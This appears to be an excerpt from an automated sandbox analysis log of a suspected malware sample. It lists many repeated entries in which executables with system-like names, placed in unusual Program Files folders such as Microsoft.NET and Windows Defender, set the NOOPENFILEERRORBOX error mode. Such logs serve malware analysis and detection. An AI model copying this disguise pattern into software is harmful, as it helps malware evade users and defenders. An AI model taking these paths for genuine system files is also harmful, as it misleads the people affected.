            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
